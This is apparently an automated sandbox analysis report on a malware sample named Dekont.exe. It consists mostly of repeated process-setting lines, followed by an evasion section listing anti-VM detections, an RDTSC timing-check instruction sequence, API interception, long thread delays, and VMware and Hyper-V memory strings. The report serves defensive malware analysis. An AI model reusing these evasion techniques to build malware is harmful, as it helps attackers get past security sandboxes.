          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: Dekont.exe PID: 1816, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\Dekont.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Users\user\Desktop\Dekont.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Users\user\Desktop\Dekont.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Users\user\Desktop\Dekont.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Users\user\Desktop\Dekont.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\Dekont.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Dekont.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Dekont.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 2B39904 second address: 2B3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 2B39B7E second address: 2B39B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Dekont.exeMemory allocated: 2670000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeMemory allocated: 2920000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeMemory allocated: 2670000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeMemory allocated: 98A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeMemory allocated: A8A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeMemory allocated: AAE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeMemory allocated: BAE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\Dekont.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5775Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3877Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7528Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2416Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 9823Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-13904
          Source: C:\Users\user\Desktop\Dekont.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\control.exeAPI coverage: 2.0 %
          Source: C:\Users\user\Desktop\Dekont.exe TID: 6348Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7128Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 3660Thread sleep count: 7528 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3660Thread sleep time: -15056000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 3660Thread sleep count: 2416 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3660Thread sleep time: -4832000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 1816Thread sleep count: 149 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 1816Thread sleep time: -298000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 1816Thread sleep count: 9823 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 1816Thread sleep time: -19646000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Dekont.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000006.00000003.3096651186.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000006.00000002.4533610517.0000000009C22000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000006.00000002.4533709469.0000000009C96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000003.3097004039.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000006.00000002.4533709469.0000000009C96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.2077619011.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000006.00000003.3097004039.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000006.00000003.3096651186.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000003.3097004039.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000006.00000003.3097004039.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
          Source: explorer.exe, 00000006.00000002.4533610517.0000000009C22000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000006.00000000.2077619011.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
